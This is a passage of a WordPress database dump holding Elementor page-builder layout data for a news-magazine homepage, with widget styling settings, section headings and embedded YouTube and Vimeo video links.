":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"300\",\"category_bg_color\":\"#357edd\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1412,489,'_elementor_version','0.4'),(1413,489,'_elementor_css','a:3:{s:4:\"time\";i:1508920156;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1414,490,'_elementor_edit_mode','builder'),(1415,490,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"300\",\"category_bg_color\":\"#357edd\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1416,490,'_elementor_version','0.4'),(1419,360,'_oembed_3bdd350cf0ca2ca1bebe676e109d3ce7','{{unknown}}'),(1420,491,'_elementor_edit_mode','builder'),(1421,491,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\"